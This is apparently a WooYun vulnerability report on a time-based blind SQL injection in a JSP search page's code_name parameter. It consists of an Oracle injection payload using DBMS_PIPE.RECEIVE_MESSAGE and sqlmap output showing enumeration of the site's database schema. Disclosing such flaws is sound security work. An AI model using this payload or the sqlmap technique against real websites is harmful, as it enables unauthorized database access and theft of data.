WooYun.org

http://**.**.**.**/sofpro/ext_researchmanage/search1.jsp?code_name=qianj&keyword=

---
Parameter: code_name (GET)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: code_name=qianj' AND 7421=DBMS_PIPE.RECEIVE_MESSAGE(CHR(81)||CHR(111)||CHR(69)||CHR(97),5) AND 'lBtT'='lBtT&keyword=
---
[15:31:35] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[15:31:35] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[15:31:35] [INFO] fetching database (schema) names
[15:31:35] [INFO] fetching number of databases
[15:31:35] [WARNING] time-based comparison requires larger statistical model, please wait..............................
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[15:31:43] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
[15:31:49] [ERROR] invalid character detected. retrying..
[15:31:49] [WARNING] increasing time delay to 6 seconds 
[15:31:58] [ERROR] invalid character detected. retrying..
[15:31:58] [WARNING] increasing time delay to 7 seconds 
[15:32:00] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[15:32:00] [ERROR] unable to retrieve the number of databases
[15:32:00] [INFO] falling back to current database
[15:32:00] [INFO] fetching current database
[15:32:00] [INFO] resumed: CMSPRO
[15:32:00] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
available databases [1]:
[*] CMSPRO